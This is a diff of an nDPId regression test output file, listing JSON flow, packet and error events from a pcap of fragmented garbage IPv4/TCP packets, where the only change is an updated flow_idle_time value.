+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244026217,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4lJCNAIyQlXiYqKComXiX0OgAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1567,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026217} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1567,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjcnNkbHVoZ2tmZHNia24="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1568,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026217} 
@@ -3756,8 +3756,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1877,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj8="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1878,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026221} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1878,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjc0ODM5Niko"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026521,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiomXiUkI0AhQCMkJV4mKigSPwAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026521,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiomXiUkI0AhQCMkJV4mKigSPwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1880,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026521} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1880,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAikoKiZeJSQjQCMkJV4mKig="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1881,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026521} 
@@ -4382,8 +4382,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2190,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2191,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026525} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2191,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkRGR0hKSyZe"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026825,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyNFVFIlWV5VJkkqT1DEpQAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026825,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyNFVFIlWV5VJkkqT1DEpQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2193,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026825} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2193,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAnsiOmhkZmxrZGE+TDxNTkI="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2194,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026825} 
@@ -5008,8 +5008,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2503,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkRFVyNAJCVeSEJHVgo0MjE="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2504,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026828} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2504,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjQ2MzE5ODIw"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244027129,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1534244027129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjUxKSgqJl4lJCNAIyQlXiYeLwAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244027129,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2505,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjUxKSgqJl4lJCNAIyQlXiYeLwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2506,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027129} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2506,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiooKiZeJSQjcnNkbHVoZ2s="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2507,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027129} 
@@ -5634,8 +5634,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2816,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmJrbnZjLy50Z2Z0Zz9HUj8="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2817,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027133} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2817,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027129,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdSP3NSPzc0"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027433,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1534244027433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjgzOTYpKComXiUkI0AhQCMkIQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027433,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027433,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":14387,"dst_port":14646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2818,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1534244027433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjgzOTYpKComXiUkI0AhQCMkIQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2819,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027433} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2819,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQlXiYqKCkoKiZeJSQjQCM="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2820,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027433} 
@@ -6260,8 +6260,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3129,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiYqKComXiUkIyYqKEtJSkg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3130,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027437} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3130,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027433,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdGRDIqJkRG"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027737,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1534244027737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdISksmXiUkIyNFVFIlWV76VAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244027737,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3131,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdISksmXiUkIyNFVFIlWV76VAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3132,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027737} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3132,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAlUmSSpPUHsiOmhkZmxrZGE="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3133,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244027737} 
@@ -6886,8 +6886,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3442,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAk1OQkhHRkRFVyNAJCVeSEI="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3443,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244027741} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3443,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244027737,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdWCjQyMTQ2"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244028041,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1534244028041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjMxOTgyMDUxKSgqJl4lJCNCBAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244028041,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjMxOTgyMDUxKSgqJl4lJCNCBAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3445,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028041} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3445,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkAjJCVeJiooKiZeJSQjcnM="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3446,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028041} 
